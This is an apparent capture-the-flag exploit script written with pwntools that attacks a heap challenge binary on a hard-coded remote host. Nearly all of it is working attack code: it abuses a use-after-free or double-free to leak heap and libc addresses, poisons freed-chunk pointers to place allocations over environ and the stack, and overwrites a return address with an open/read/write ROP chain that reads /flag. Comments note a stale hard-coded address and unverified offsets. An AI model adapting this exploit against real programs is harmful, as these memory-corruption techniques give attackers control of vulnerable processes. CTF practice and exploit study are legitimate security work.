| from pwn import *
# Load the challenge binary into the pwntools context before anything else.
context.binary = 'pwn'
# The libc shipped with the challenge.  Every libc-relative constant later in
# the script (symbol lookups, ROP gadget offsets, the leak-to-base delta) is
# tied to this exact build, so swapping the file silently breaks the exploit.
libc = ELF('libc.so.6', checksec=False)
# Hard-coded CTF target (host, port).
io = remote('123.60.179.52', 30307)
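def rc(n):
    """Receive exactly ``n`` bytes from the remote tube."""
    return io.recv(n)


def ru(x):
    """Receive up to delimiter ``x``; the delimiter itself is dropped."""
    return io.recvuntil(x, drop=True)


def sa(a, b):
    """Wait for prompt ``a``, then send ``b`` as-is (no trailing newline)."""
    return io.sendafter(a, b)


def sla(a, b):
    """Wait for prompt ``a``, then send ``b`` followed by a newline."""
    return io.sendlineafter(a, b)


def ia():
    """Hand the connection over to the user (interactive mode)."""
    return io.interactive()


def uu64(x):
    """Unpack a short little-endian pointer leak ``x`` (e.g. 6 bytes) as a u64.

    Fix: the original padded with the str literal ``'\\x00'``.  Under
    Python 3 the tube hands back ``bytes`` and ``bytes.ljust`` rejects a
    str fill character with TypeError; ``b'\\x00'`` is a plain str on
    Python 2, so this is behaviour-identical there and working on 3.
    """
    return u64(x.ljust(8, b'\x00'))


def libc_os(x):
    """Rebase libc offset ``x`` onto ``libc_base`` (module global, set after the leak)."""
    return libc_base + x


def libc_sym(x):
    """Absolute runtime address of libc symbol ``x``."""
    return libc_os(libc.sym[x])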
def menu(choice):
    """Select entry ``choice`` at the program's ``>>`` menu prompt."""
    io.sendlineafter('>>', str(choice))
def add(size, content):
    """Menu option 1: request a chunk of ``size`` bytes and fill it with ``content``.

    ``content`` is sent raw (no newline), so it must already be exactly what
    the program should store.
    """
    size_prompt = 'Pls input the size:\n'
    content_prompt = 'Pls input Content:\n'
    menu(1)
    sla(size_prompt, str(size))
    sa(content_prompt, content)
def delete(idx):
    """Menu option 2: release the entry stored at index ``idx``."""
    menu(2)
    io.sendlineafter('Please input the idx:\n', str(idx))
def edit(idx, content):
    """Menu option 3: overwrite entry ``idx`` with ``content`` (sent raw, no newline)."""
    idx_prompt = 'Please input the idx:\n'
    content_prompt = 'Pls input the Content:\n'
    menu(3)
    io.sendlineafter(idx_prompt, str(idx))
    io.sendafter(content_prompt, content)
def show(idx):
    """Menu option 4: print entry ``idx`` -- the read primitive every leak below uses."""
    menu(4)
    io.sendlineafter('Please input the idx:\n', str(idx))
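# --- Stage 1: leak a pointer out of a freed 0x500 chunk ---------------------
for _ in range(2):
    add(0x500, 'a')
# Index 0 is deleted four times in a row, so the program's delete path
# presumably neither clears the slot nor rejects a repeated free (UAF /
# double-free primitive) -- confirm against the binary.
for _ in range(4):
    delete(0)
add(0x500, 'a')
# Overwrite only the two low bytes of the freed chunk's first qword, then
# read it back: whatever pointer the allocator keeps there leaks with its
# low 16 bits clobbered by 'aa', which the shift pair below masks off.
edit(0, 'aa')
show(0)
leak = uu64(ru('\n'))
leak = leak >> 16 << 16
# Delta (0x1fdf0) measured in a debugging session.  Despite the variable
# name nothing here shows a libc address -- the constants look like
# mmap/heap-range addresses; verify against the allocator before reuse.
leak_libc_addr = leak - (0x4297c020000 - 0x4297c000210)
# Poison the freed chunk's first qword (its link pointer) with that address.
edit(0, flat(leak_libc_addr))
add(0x500, 'a')
# Filler up to offset 0x30 followed by a single 'a'; bytes beyond 0x31 keep
# their old content, so show() reveals the qword at offset 0x30.
pld = flat({0x30: 'a'})
add(0x500, pld)
show(4)
rc(0x30)
# --- Stage 2: libc base, then environ -> stack address ----------------------
# The leaked qword's low byte is the 'a' (0x61) we just wrote, which is why
# the build-specific constant ends in 0x61: it absorbs the clobbered byte.
libc_base = uu64(ru('\n')) - 0x214861
environ = libc_sym('environ')
# Fake chunk metadata written over entry 4.  From the flow that follows, the
# third field appears to be the pointer the next allocation is served from;
# environ-0x10 places environ at offset 0x10 of that chunk.  The remaining
# fields look copied from a legitimate chunk and are not decodable here.
# NOTE(review): 0x7f4a25193820 is an absolute address captured from one
# local run and is stale under ASLR on every other run.  If the allocator
# ever dereferences it the exploit fails remotely; it should be rebased via
# libc_os() or a heap-relative delta.  Left as-is because the right offset
# cannot be recovered from this script.
pld = flat([
    1, 0x3300030002, environ - 0x10, 0x50000000002, 0, 0, 0x7f4a25193820
])
edit(4, pld)
# The chunk returned now (shown as entry 5) overlaps environ: 0x10 bytes of
# filler, then the stack pointer stored in environ.
add(0x500, 'a' * 0x10)
show(5)
rc(0x10)
stack_addr = uu64(ru('\n'))
# ret_addr = *environ - 0x120, another debugger-measured delta; presumably
# the saved return address that is popped after the final add() below.
ret_addr = stack_addr - (0x7ffde5436a68 - 0x7ffde5436948)
# Same fake metadata, now redirecting the next allocation onto the stack.
pld = flat([
    1, 0x3300030002, ret_addr, 0x50000000002, 0, 0, 0x7f4a25193820
])
edit(4, pld)
# --- Stage 3: open/read/write ROP chain written over the return address -----
read_addr = libc_sym('read')
write_addr = libc_sym('write')
open_addr = libc_sym('open')
# Gadget offsets are specific to the bundled libc.so.6.
pop_rdi = libc_os(0x0000000000023b6a)
pop_rsi = libc_os(0x000000000002601f)
pop_rdx = libc_os(0x0000000000142c92)
# The chain is 15 qwords = 0x78 bytes, so the "/flag" string appended after
# it lands exactly at ret_addr + 0x78.
flag_addr = ret_addr + 0x78
rop_chain = flat([
    # open("/flag", 0 /* O_RDONLY */)
    pop_rdi, flag_addr, pop_rsi, 0, open_addr,
    # read(3, ret_addr + 0x100, 0x50) -- assumes only fds 0-2 are open, so the
    # flag file gets descriptor 3
    pop_rdi, 3, pop_rsi, ret_addr + 0x100, pop_rdx, 0x50, read_addr,
    # write(1, ...) reuses rsi/rdx from the read() setup (same buffer, same
    # 0x50 length); relies on read() not clobbering them
    pop_rdi, 1, write_addr
])
# Fix: bytes literal so this concatenation also works on Python 3, where
# flat() yields bytes and bytes + str is a TypeError.  b'...' is a plain str
# on Python 2, so nothing changes there.
rop_chain += b'/flag\x00'
add(0x500, rop_chain)
ia()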